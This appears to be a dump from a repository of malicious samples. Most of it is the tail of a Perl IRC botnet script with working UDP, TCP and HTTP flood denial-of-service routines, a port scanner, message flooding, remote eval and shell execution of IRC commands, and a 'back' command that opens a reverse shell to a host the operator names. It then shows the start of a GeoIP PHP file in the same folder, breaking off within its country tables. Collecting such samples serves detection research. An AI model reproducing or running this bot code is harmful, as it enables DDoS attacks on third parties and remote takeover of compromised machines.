1373 |            if ($funcarg =~ /^deop (.*)/) {
1374 |               sendraw($IRC_cur_socket, "MODE $printl -o ".$1);
1375 |            }
1376 |            if ($funcarg =~ /^voice (.*)/) {
1377 |               sendraw($IRC_cur_socket, "MODE $printl +v ".$1);
1378 |            }
1379 |            if ($funcarg =~ /^die (.*)/) {
1380 |               sendraw($IRC_cur_socket, "QUIT :".$1);
1381 |               $killd = "kill -9 ".fork;
1382 |               system (`$killd`);
1383 |            }
1384 |            if ($funcarg =~ /^devoice (.*)/) {
1385 |               sendraw($IRC_cur_socket, "MODE $printl -v ".$1);
1386 |            }
1387 |            if ($funcarg =~ /^say (.*)/) {
1388 |               sendraw($IRC_cur_socket, "PRIVMSG $printl :".$1);
1389 |            }
1390 |            if ($funcarg =~ /^reset(.*)/) {
1391 |               sendraw($IRC_cur_socket, "QUIT :Di3 for my Master");
1392 |            }
1393 |            if ($funcarg =~ /^die(.*)/) {
1394 |               if ($1 eq ""){
1395 |                  sendraw($IRC_cur_socket, "QUIT :Di3 for my Master");
1396 |                  $killd = "kill -9 ".fork;
1397 |                  system (`$killd`);
1398 |               }
1399 |            }
1400 | 
1401 |            if ($funcarg =~ /^tsunami\s+(\d+)\s+(.*)/) {
1402 |              for (my $dx=0; $dx<=$1; $dx++)
1403 |              {
1404 |               my @nickxxxx = ("\\","|","_","-","`","^","{","}","[","]");
1405 |               $nickfgv = $nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx].$nickxxxx[rand scalar @nickxxxx];
1406 |               $msgflood = "";
1407 |               $msgflood = $msgflood.$msgflood;
1408 |               sendraw($IRC_cur_socket, "NICK ".$nickfgv);
1409 |               sleep 10;
1410 |               sendraw($IRC_cur_socket, "PRIVMSG ".$2." :".$msgflood);
1411 |               sleep 2;
1412 |               sendraw($IRC_cur_socket, "NOTICE ".$2." :".$msgflood);
1413 |              }
1414 |               sendraw($IRC_cur_socket, "NICK ".$nick);
1415 |            }
1416 |            if ($funcarg =~ /^help(.*)/) {
1417 |               if ($printl eq "$msgpriv"){
1418 |                 $msghelp ="PRIVMSG $msgpriv";
1419 |               }else{
1420 |                 $msghelp ="NOTICE $msgpriv";
1421 |               }
1422 |               sendraw($IRC_cur_socket, $msghelp." :15(7@2Command List @adms15)");
1423 |               sendraw($IRC_cur_socket, $msghelp." :15(7@2Copyright (C) 200715)");
1424 |               sleep 2;
1425 |               sendraw($IRC_cur_socket, $msghelp." :12<------------------------------------------------>");
1426 |               sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2help15)");
1427 |               sleep 2;
1428 |               sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2portscan15) <IP/domain Name>");
1429 |               sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2udpflood15) <IP> <packet-size> <time>");
1430 |               sleep 2;
1431 |               sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2tcpflood15) <IP> <port> <time>");
1432 |               sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2httpflood15) <www.website.com> <time>");
1433 |               sleep 2;
1434 |               sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2say15) <msg>");
1435 |               sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2join15) <#>");
1436 |               sleep 2;
1437 |               sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2part15) <#>");
1438 |               sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2nick15) <nick>");
1439 |               sleep 2;
1440 |               sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2msg15) <#/nick>");
1441 |               sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2tsunami15) <banyak pesan> <#/nick> <msg>");
1442 |               sleep 2;
1443 |               sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2op15) <nick>");
1444 |               sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2deop15) <nick>");
1445 |               sleep 2;
1446 |               sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2voice15) <nick>");
1447 |               sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2devoice15) <nick>");
1448 |               sleep 2;
1449 |               sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2reset15)");
1450 |               sendraw($IRC_cur_socket, $msghelp." :15(7!2bht15) 15(7@2die15) <msg>");
1451 |               sleep 2;
1452 |               sendraw($IRC_cur_socket, $msghelp." :".$nick." 15(7@2back15) <ip> <port>");
1453 |               sendraw($IRC_cur_socket, $msghelp." :".$nick." 15(7@2command\B2 di atas15)");
1454 |               sleep 2;
1455 |               sendraw($IRC_cur_socket, $msghelp." :12<------------------------------------------------>");
1456 |            }
1457 |            if ($funcarg =~ /^portscan (.*)/) {
1458 |              my $hostip="$1";
1459 |              my @portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","9997","10000","12345","19150","27374","31310","33133","33733","55555");
1460 |              my (@aberta, %porta_banner);
1461 |              sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2Portscan15)12 Scanning4 ".$1." 12for open ports.");
1462 |              foreach my $porta (@portas){
1463 |                 my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
1464 |                 if ($scansock) {
1465 |                    push (@aberta, $porta);
1466 |                    $scansock->close;
1467 |                 }
1468 |              }
1469 | 
1470 |              if (@aberta) {
1471 |                sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2ScanPort15)12 Open port(s):4 @aberta");
1472 |              } else {
1473 |                sendraw($IRC_cur_socket,"PRIVMSG $printl :15(7@2ScanPort15)12 No open ports found.");
1474 |              }
1475 |            }
1476 |            if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/){
1477 |      sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2TCP DDoSing15)12 Attacking4 ".$1.":".$2." 12for4 ".$3." 12seconds.");
1478 |      my $itime = time;
1479 |      my ($cur_time);
1480 |              $cur_time = time - $itime;
1481 |      while ($3>$cur_time){
1482 |              $cur_time = time - $itime;
1483 |      &tcpflooder("$1","$2","$3");
1484 |              }
1485 |      sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2TCP DDoSing15)12 Attack done4 ".$1.":".$2.".");
1486 |            }
1487 |    if ($funcarg =~ /^version/) {
1488 | sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2Version15)12 mIRC324 ".$VERSAO." 12K.Mardam-Bey");
1489 | }
1490 | 
1491 | if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
1492 | my $host = "$1";
1493 | my $porta = "$2";
1494 | my $proto = getprotobyname('tcp');
1495 | my $iaddr = inet_aton($host);
1496 | my $paddr = sockaddr_in($porta, $iaddr);
1497 | my $shell = "/bin/sh -i";
1498 | if ($^O eq "MSWin32") {
1499 | $shell = "cmd.exe";
1500 | }
1501 | socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
1502 | connect(SOCKET, $paddr) or die "connect: $!";
1503 | open(STDIN, ">&SOCKET");
1504 | open(STDOUT, ">&SOCKET");
1505 | open(STDERR, ">&SOCKET");
1506 | system("$shell");
1507 | close(STDIN);
1508 | close(STDOUT);
1509 | close(STDERR);
1510 | 
1511 |   sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2BackConnect15)4: 12Connecting to4 $host:$porta");
1512 | 
1513 | }
1514 | 
1515 |   if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
1516 |      sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2HTTP DDoSing15)12 Attacking4 ".$1.":80 12for4 ".$2." 12seconds.");
1517 |      my $itime = time;
1518 |      my ($cur_time);
1519 |              $cur_time = time - $itime;
1520 |      while ($2>$cur_time){
1521 |              $cur_time = time - $itime;
1522 |      my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
1523 |              print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
1524 |      close($socket);
1525 |              }
1526 |      sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2HTTP15)12 Attacking done4 ".$1.".");
1527 |            }
1528 |            if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
1529 |              sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2UDP DDoSing15)12 Attacking4 ".$1." 12with4 ".$2." 12Kb packets for4 ".$3." 12seconds.");
1530 |              my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
1531 |              $dtime = 1 if $dtime == 0;
1532 |              my %bytes;
1533 |              $bytes{igmp} = $2 * $pacotes{igmp};
1534 |              $bytes{icmp} = $2 * $pacotes{icmp};
1535 |              $bytes{o} = $2 * $pacotes{o};
1536 |              $bytes{udp} = $2 * $pacotes{udp};
1537 |              $bytes{tcp} = $2 * $pacotes{tcp};
1538 |              sendraw($IRC_cur_socket, "PRIVMSG $printl :15(7@2UDP15)12 Sent4 ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." 12Kb in4 ".$dtime." 12seconds to4 ".$1.".");
1539 |            }
1540 |            exit;
1541 |        }
1542 |   }
1543 | }
1544 | 
1545 | sub ircase {
1546 |   my ($kem, $printl, $case) = @_;
1547 | 
1548 |   if ($case =~ /^join (.*)/) {
1549 |      j("$1");
1550 |    }
1551 |    if ($case =~ /^part (.*)/) {
1552 |       p("$1");
1553 |    }
1554 |    if ($case =~ /^rejoin\s+(.*)/) {
1555 |       my $chan = $1;
1556 |       if ($chan =~ /^(\d+) (.*)/) {
1557 |         for (my $ca = 1; $ca <= $1; $ca++ ) {
1558 |           p("$2");
1559 |           j("$2");
1560 |         }
1561 |       } else {
1562 |           p("$chan");
1563 |           j("$chan");
1564 |       }
1565 |    }
1566 |    if ($case =~ /^op/) {
1567 |       op("$printl", "$kem") if $case eq "op";
1568 |       my $oarg = substr($case, 3);
1569 |       op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
1570 |    }
1571 |    if ($case =~ /^deop/) {
1572 |       deop("$printl", "$kem") if $case eq "deop";
1573 |       my $oarg = substr($case, 5);
1574 |       deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
1575 |    }
1576 |    if ($case =~ /^msg\s+(\S+) (.*)/) {
1577 |       msg("$1", "$2");
1578 |    }
1579 |    if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
1580 |       for (my $cf = 1; $cf <= $1; $cf++) {
1581 |         msg("$2", "$3");
1582 |       }
1583 |    }
1584 |    if ($case =~ /^ctcp\s+(\S+) (.*)/) {
1585 |       ctcp("$1", "$2");
1586 |    }
1587 |    if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
1588 |       for (my $cf = 1; $cf <= $1; $cf++) {
1589 |         ctcp("$2", "$3");
1590 |       }
1591 |    }
1592 |    if ($case =~ /^nick (.*)/) {
1593 |       nick("$1");
1594 |    }
1595 |    if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
1596 |        conectar("$2", "$1", 6667);
1597 |    }
1598 |    if ($case =~ /^raw (.*)/) {
1599 |       sendraw("$1");
1600 |    }
1601 |    if ($case =~ /^eval (.*)/) {
1602 |      eval "$1";
1603 |    }
1604 | }
1605 | 
1606 | sub shell {
1607 |   my $printl=$_[0];
1608 |   my $comando=$_[1];
1609 |   if ($comando =~ /cd (.*)/) {
1610 |     chdir("$1") || msg("$printl", "No such file or directory");
1611 |     return;
1612 |   }
1613 |   elsif ($pid = fork) {
1614 |      waitpid($pid, 0);
1615 |   } else {
1616 |       if (fork) {
1617 |          exit;
1618 |        } else {
1619 |            my @resp=`$comando 2>&1 3>&1`;
1620 |            my $c=0;
1621 |            foreach my $linha (@resp) {
1622 |              $c++;
1623 |              chop $linha;
1624 |              sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
1625 |              if ($c == "$linas_max") {
1626 |                $c=0;
1627 |                sleep $sleep;
1628 |              }
1629 |            }
1630 |            exit;
1631 |        }
1632 |   }
1633 | }
1634 | 
1635 | sub tcpflooder {
1636 |  my $itime = time;
1637 |  my ($cur_time);
1638 |  my ($ia,$pa,$proto,$j,$l,$t);
1639 |  $ia=inet_aton($_[0]);
1640 |  $pa=sockaddr_in($_[1],$ia);
1641 |  $ftime=$_[2];
1642 |  $proto=getprotobyname('tcp');
1643 |  $j=0;$l=0;
1644 |  $cur_time = time - $itime;
1645 |  while ($l<1000){
1646 |   $cur_time = time - $itime;
1647 |   last if $cur_time >= $ftime;
1648 |   $t="SOCK$l";
1649 |   socket($t,PF_INET,SOCK_STREAM,$proto);
1650 |   connect($t,$pa)||$j--;
1651 |   $j++;$l++;
1652 |  }
1653 |  $l=0;
1654 |  while ($l<1000){
1655 |   $cur_time = time - $itime;
1656 |   last if $cur_time >= $ftime;
1657 |   $t="SOCK$l";
1658 |   shutdown($t,2);
1659 |   $l++;
1660 |  }
1661 | }
1662 | 
1663 | sub udpflooder {
1664 |   my $iaddr = inet_aton($_[0]);
1665 |   my $msg = 'A' x $_[1];
1666 |   my $ftime = $_[2];
1667 |   my $cp = 0;
1668 |   my (%pacotes);
1669 |   $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
1670 | 
1671 |   socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
1672 | 
1673 |   socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
1674 |   socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
1675 |   socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
1676 |   return(undef) if $cp == 4;
1677 |   my $itime = time;
1678 |   my ($cur_time);
1679 |   while ( 1 ) {
1680 |      for (my $porta = 1; $porta <= 65000; $porta++) {
1681 |        $cur_time = time - $itime;
1682 |        last if $cur_time >= $ftime;
1683 |        send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
1684 |        send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
1685 |        send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
1686 |        send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
1687 | 
1688 |        for (my $pc = 3; $pc <= 255;$pc++) {
1689 |          next if $pc == 6;
1690 |          $cur_time = time - $itime;
1691 |          last if $cur_time >= $ftime;
1692 |          socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
1693 |          send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
1694 |        }
1695 |  }
1696 |      last if $cur_time >= $ftime;
1697 |   }
1698 |   return($cur_time, %pacotes);
1699 | }
1700 | 
1701 | sub ctcp {
1702 |    return unless $#_ == 1;
1703 |    sendraw("PRIVMSG $_[0] :\001$_[1]\001");
1704 | }
1705 | sub msg {
1706 |    return unless $#_ == 1;
1707 |    sendraw("PRIVMSG $_[0] :$_[1]");
1708 | }
1709 | sub notice {
1710 |    return unless $#_ == 1;
1711 |    sendraw("NOTICE $_[0] :$_[1]");
1712 | }
1713 | sub op {
1714 |    return unless $#_ == 1;
1715 |    sendraw("MODE $_[0] +o $_[1]");
1716 | }
1717 | sub deop {
1718 |    return unless $#_ == 1;
1719 |    sendraw("MODE $_[0] -o $_[1]");
1720 | }
1721 | sub j { &join(@_); }
1722 | sub join {
1723 |    return unless $#_ == 0;
1724 |    sendraw("JOIN $_[0]");
1725 | }
1726 | sub p { part(@_); }
1727 | sub part {
1728 |   sendraw("PART $_[0]");
1729 | }
1730 | sub nick {
1731 |   return unless $#_ == 0;
1732 |   sendraw("NICK $_[0]");
1733 | }
1734 | sub quit {
1735 |   sendraw("QUIT :$_[0]");
1736 | }
1737 | 


--------------------------------------------------------------------------------
/malicious_samples/geoip.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | 
  3 | /* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 2; tab-width: 2 -*- */
  4 | /* geoip.inc
  5 |  *
  6 |  * Copyright (C) 2007 MaxMind LLC
  7 |  *
  8 |  * This library is free software; you can redistribute it and/or
  9 |  * modify it under the terms of the GNU Lesser General Public
 10 |  * License as published by the Free Software Foundation; either
 11 |  * version 2.1 of the License, or (at your option) any later version.
 12 |  *
 13 |  * This library is distributed in the hope that it will be useful,
 14 |  * but WITHOUT ANY WARRANTY; without even the implied warranty of
 15 |  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 16 |  * Lesser General Public License for more details.
 17 |  *
 18 |  * You should have received a copy of the GNU Lesser General Public
 19 |  * License along with this library; if not, write to the Free Software
 20 |  * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 21 |  */
 22 | 
 23 | define("GEOIP_COUNTRY_BEGIN", 16776960);
 24 | define("GEOIP_STATE_BEGIN_REV0", 16700000);
 25 | define("GEOIP_STATE_BEGIN_REV1", 16000000);
 26 | define("GEOIP_STANDARD", 0);
 27 | define("GEOIP_MEMORY_CACHE", 1);
 28 | define("GEOIP_SHARED_MEMORY", 2);
 29 | define("STRUCTURE_INFO_MAX_SIZE", 20);
 30 | define("DATABASE_INFO_MAX_SIZE", 100);
 31 | define("GEOIP_COUNTRY_EDITION", 106);
 32 | define("GEOIP_PROXY_EDITION", 8);
 33 | define("GEOIP_ASNUM_EDITION", 9);
 34 | define("GEOIP_NETSPEED_EDITION", 10);
 35 | define("GEOIP_REGION_EDITION_REV0", 112);
 36 | define("GEOIP_REGION_EDITION_REV1", 3);
 37 | define("GEOIP_CITY_EDITION_REV0", 111);
 38 | define("GEOIP_CITY_EDITION_REV1", 2);
 39 | define("GEOIP_ORG_EDITION", 110);
 40 | define("GEOIP_ISP_EDITION", 4);
 41 | define("SEGMENT_RECORD_LENGTH", 3);
 42 | define("STANDARD_RECORD_LENGTH", 3);
 43 | define("ORG_RECORD_LENGTH", 4);
 44 | define("MAX_RECORD_LENGTH", 4);
 45 | define("MAX_ORG_RECORD_LENGTH", 300);
 46 | define("GEOIP_SHM_KEY", 0x4f415401);
 47 | define("US_OFFSET", 1);
 48 | define("CANADA_OFFSET", 677);
 49 | define("WORLD_OFFSET", 1353);
 50 | define("FIPS_RANGE", 360);
 51 | define("GEOIP_UNKNOWN_SPEED", 0);
 52 | define("GEOIP_DIALUP_SPEED", 1);
 53 | define("GEOIP_CABLEDSL_SPEED", 2);
 54 | define("GEOIP_CORPORATE_SPEED", 3);
 55 | 
 56 | class GeoIP {
 57 |     var $flags;
 58 |     var $filehandle;
 59 |     var $memory_buffer;
 60 |     var $databaseType;
 61 |     var $databaseSegments;
 62 |     var $record_length;
 63 |     var $shmid;
 64 |     var $GEOIP_COUNTRY_CODE_TO_NUMBER = array(
 65 | "" => 0, "AP" => 1, "EU" => 2, "AD" => 3, "AE" => 4, "AF" => 5, 
 66 | "AG" => 6, "AI" => 7, "AL" => 8, "AM" => 9, "AN" => 10, "AO" => 11, 
 67 | "AQ" => 12, "AR" => 13, "AS" => 14, "AT" => 15, "AU" => 16, "AW" => 17, 
 68 | "AZ" => 18, "BA" => 19, "BB" => 20, "BD" => 21, "BE" => 22, "BF" => 23, 
 69 | "BG" => 24, "BH" => 25, "BI" => 26, "BJ" => 27, "BM" => 28, "BN" => 29, 
 70 | "BO" => 30, "BR" => 31, "BS" => 32, "BT" => 33, "BV" => 34, "BW" => 35, 
 71 | "BY" => 36, "BZ" => 37, "CA" => 38, "CC" => 39, "CD" => 40, "CF" => 41, 
 72 | "CG" => 42, "CH" => 43, "CI" => 44, "CK" => 45, "CL" => 46, "CM" => 47, 
 73 | "CN" => 48, "CO" => 49, "CR" => 50, "CU" => 51, "CV" => 52, "CX" => 53, 
 74 | "CY" => 54, "CZ" => 55, "DE" => 56, "DJ" => 57, "DK" => 58, "DM" => 59, 
 75 | "DO" => 60, "DZ" => 61, "EC" => 62, "EE" => 63, "EG" => 64, "EH" => 65, 
 76 | "ER" => 66, "ES" => 67, "ET" => 68, "FI" => 69, "FJ" => 70, "FK" => 71, 
 77 | "FM" => 72, "FO" => 73, "FR" => 74, "FX" => 75, "GA" => 76, "GB" => 77,
 78 | "GD" => 78, "GE" => 79, "GF" => 80, "GH" => 81, "GI" => 82, "GL" => 83, 
 79 | "GM" => 84, "GN" => 85, "GP" => 86, "GQ" => 87, "GR" => 88, "GS" => 89, 
 80 | "GT" => 90, "GU" => 91, "GW" => 92, "GY" => 93, "HK" => 94, "HM" => 95, 
 81 | "HN" => 96, "HR" => 97, "HT" => 98, "HU" => 99, "ID" => 100, "IE" => 101, 
 82 | "IL" => 102, "IN" => 103, "IO" => 104, "IQ" => 105, "IR" => 106, "IS" => 107, 
 83 | "IT" => 108, "JM" => 109, "JO" => 110, "JP" => 111, "KE" => 112, "KG" => 113, 
 84 | "KH" => 114, "KI" => 115, "KM" => 116, "KN" => 117, "KP" => 118, "KR" => 119, 
 85 | "KW" => 120, "KY" => 121, "KZ" => 122, "LA" => 123, "LB" => 124, "LC" => 125, 
 86 | "LI" => 126, "LK" => 127, "LR" => 128, "LS" => 129, "LT" => 130, "LU" => 131, 
 87 | "LV" => 132, "LY" => 133, "MA" => 134, "MC" => 135, "MD" => 136, "MG" => 137, 
 88 | "MH" => 138, "MK" => 139, "ML" => 140, "MM" => 141, "MN" => 142, "MO" => 143, 
 89 | "MP" => 144, "MQ" => 145, "MR" => 146, "MS" => 147, "MT" => 148, "MU" => 149, 
 90 | "MV" => 150, "MW" => 151, "MX" => 152, "MY" => 153, "MZ" => 154, "NA" => 155,
 91 | "NC" => 156, "NE" => 157, "NF" => 158, "NG" => 159, "NI" => 160, "NL" => 161, 
 92 | "NO" => 162, "NP" => 163, "NR" => 164, "NU" => 165, "NZ" => 166, "OM" => 167, 
 93 | "PA" => 168, "PE" => 169, "PF" => 170, "PG" => 171, "PH" => 172, "PK" => 173, 
 94 | "PL" => 174, "PM" => 175, "PN" => 176, "PR" => 177, "PS" => 178, "PT" => 179, 
 95 | "PW" => 180, "PY" => 181, "QA" => 182, "RE" => 183, "RO" => 184, "RU" => 185, 
 96 | "RW" => 186, "SA" => 187, "SB" => 188, "SC" => 189, "SD" => 190, "SE" => 191, 
 97 | "SG" => 192, "SH" => 193, "SI" => 194, "SJ" => 195, "SK" => 196, "SL" => 197, 
 98 | "SM" => 198, "SN" => 199, "SO" => 200, "SR" => 201, "ST" => 202, "SV" => 203, 
 99 | "SY" => 204, "SZ" => 205, "TC" => 206, "TD" => 207, "TF" => 208, "TG" => 209, 
100 | "TH" => 210, "TJ" => 211, "TK" => 212, "TM" => 213, "TN" => 214, "TO" => 215, 
101 | "TL" => 216, "TR" => 217, "TT" => 218, "TV" => 219, "TW" => 220, "TZ" => 221, 
102 | "UA" => 222, "UG" => 223, "UM" => 224, "US" => 225, "UY" => 226, "UZ" => 227, 
103 | "VA" => 228, "VC" => 229, "VE" => 230, "VG" => 231, "VI" => 232, "VN" => 233,
104 | "VU" => 234, "WF" => 235, "WS" => 236, "YE" => 237, "YT" => 238, "RS" => 239, 
105 | "ZA" => 240, "ZM" => 241, "ME" => 242, "ZW" => 243, "A1" => 244, "A2" => 245, 
106 | "O1" => 246, "AX" => 247, "GG" => 248, "IM" => 249, "JE" => 250, "BL" => 251,
107 | "MF" => 252
108 | );
109 |     var $GEOIP_COUNTRY_CODES = array(
110 | "", "AP", "EU", "AD", "AE", "AF", "AG", "AI", "AL", "AM", "AN", "AO", "AQ",
111 | "AR", "AS", "AT", "AU", "AW", "AZ", "BA", "BB", "BD", "BE", "BF", "BG", "BH",
112 | "BI", "BJ", "BM", "BN", "BO", "BR", "BS", "BT", "BV", "BW", "BY", "BZ", "CA",
113 | "CC", "CD", "CF", "CG", "CH", "CI", "CK", "CL", "CM", "CN", "CO", "CR", "CU",
114 | "CV", "CX", "CY", "CZ", "DE", "DJ", "DK", "DM", "DO", "DZ", "EC", "EE", "EG",
115 | "EH", "ER", "ES", "ET", "FI", "FJ", "FK", "FM", "FO", "FR", "FX", "GA", "GB",
116 | "GD", "GE", "GF", "GH", "GI", "GL", "GM", "GN", "GP", "GQ", "GR", "GS", "GT",
117 | "GU", "GW", "GY", "HK", "HM", "HN", "HR", "HT", "HU", "ID", "IE", "IL", "IN",
118 | "IO", "IQ", "IR", "IS", "IT", "JM", "JO", "JP", "KE", "KG", "KH", "KI", "KM",
119 | "KN", "KP", "KR", "KW", "KY", "KZ", "LA", "LB", "LC", "LI", "LK", "LR", "LS",
120 | "LT", "LU", "LV", "LY", "MA", "MC", "MD", "MG", "MH", "MK", "ML", "MM", "MN",
121 | "MO", "MP", "MQ", "MR", "MS", "MT", "MU", "MV", "MW", "MX", "MY", "MZ", "NA",
122 | "NC", "NE", "NF", "NG", "NI", "NL", "NO", "NP", "NR", "NU", "NZ", "OM", "PA",
123 | "PE", "PF", "PG", "PH", "PK", "PL", "PM", "PN", "PR", "PS", "PT", "PW", "PY",
124 | "QA", "RE", "RO", "RU", "RW", "SA", "SB", "SC", "SD", "SE", "SG", "SH", "SI",
125 | "SJ", "SK", "SL", "SM", "SN", "SO", "SR", "ST", "SV", "SY", "SZ", "TC", "TD",
126 | "TF", "TG", "TH", "TJ", "TK", "TM", "TN", "TO", "TL", "TR", "TT", "TV", "TW",
127 | "TZ", "UA", "UG", "UM", "US", "UY", "UZ", "VA", "VC", "VE", "VG", "VI", "VN",
128 | "VU", "WF", "WS", "YE", "YT", "RS", "ZA", "ZM", "ME", "ZW", "A1", "A2", "O1",
129 | "AX", "GG", "IM", "JE", "BL", "MF"
130 | );
131 |     var $GEOIP_COUNTRY_CODES3 = array(
132 | "","AP","EU","AND","ARE","AFG","ATG","AIA","ALB","ARM","ANT","AGO","AQ","ARG",
133 | "ASM","AUT","AUS","ABW","AZE","BIH","BRB","BGD","BEL","BFA","BGR","BHR","BDI",
134 | "BEN","BMU","BRN","BOL","BRA","BHS","BTN","BV","BWA","BLR","BLZ","CAN","CC",
135 | "COD","CAF","COG","CHE","CIV","COK","CHL","CMR","CHN","COL","CRI","CUB","CPV",
136 | "CX","CYP","CZE","DEU","DJI","DNK","DMA","DOM","DZA","ECU","EST","EGY","ESH",
137 | "ERI","ESP","ETH","FIN","FJI","FLK","FSM","FRO","FRA","FX","GAB","GBR","GRD",
138 | "GEO","GUF","GHA","GIB","GRL","GMB","GIN","GLP","GNQ","GRC","GS","GTM","GUM",
139 | "GNB","GUY","HKG","HM","HND","HRV","HTI","HUN","IDN","IRL","ISR","IND","IO",
140 | "IRQ","IRN","ISL","ITA","JAM","JOR","JPN","KEN","KGZ","KHM","KIR","COM","KNA",
141 | "PRK","KOR","KWT","CYM","KAZ","LAO","LBN","LCA","LIE","LKA","LBR","LSO","LTU",
142 | "LUX","LVA","LBY","MAR","MCO","MDA","MDG","MHL","MKD","MLI","MMR","MNG","MAC",
143 | "MNP","MTQ","MRT","MSR","MLT","MUS","MDV","MWI","MEX","MYS","MOZ","NAM","NCL",
144 | "NER","NFK","NGA","NIC","NLD","NOR","NPL","NRU","NIU","NZL","OMN","PAN","PER",
145 | "PYF","PNG","PHL","PAK","POL","SPM","PCN","PRI","PSE","PRT","PLW","PRY","QAT",
146 | "REU","ROU","RUS","RWA","SAU","SLB","SYC","SDN","SWE","SGP","SHN","SVN","SJM",
147 | "SVK","SLE","SMR","SEN","SOM","SUR","STP","SLV","SYR","SWZ","TCA","TCD","TF",
148 | "TGO","THA","TJK","TKL","TLS","TKM","TUN","TON","TUR","TTO","TUV","TWN","TZA",
149 | "UKR","UGA","UM","USA","URY","UZB","VAT","VCT","VEN","VGB","VIR","VNM","VUT",
150 | "WLF","WSM","YEM","YT","SRB","ZAF","ZMB","MNE","ZWE","A1","A2","O1",
151 | "ALA","GGY","IMN","JEY","BLM","MAF"
152 |     );
153 |     var $GEOIP_COUNTRY_NAMES = array(
154 | "", "Asia/Pacific Region", "Europe", "Andorra", "United Arab Emirates",
155 | "Afghanistan", "Antigua and Barbuda", "Anguilla", "Albania", "Armenia",
156 | "Netherlands Antilles", "Angola", "Antarctica", "Argentina", "American Samoa",
157 | "Austria", "Australia", "Aruba", "Azerbaijan", "Bosnia and Herzegovina",
158 | "Barbados", "Bangladesh", "Belgium", "Burkina Faso", "Bulgaria", "Bahrain",
159 | "Burundi", "Benin", "Bermuda", "Brunei Darussalam", "Bolivia", "Brazil",
160 | "Bahamas", "Bhutan", "Bouvet Island", "Botswana", "Belarus", "Belize",
161 | "Canada", "Cocos (Keeling) Islands", "Congo, The Democratic Republic of the",
162 | "Central African Republic", "Congo", "Switzerland", "Cote D'Ivoire", "Cook Islands",
163 | "Chile", "Cameroon", "China", "Colombia", "Costa Rica", "Cuba", "Cape Verde",
164 | "Christmas Island", "Cyprus", "Czech Republic", "Germany", "Djibouti",
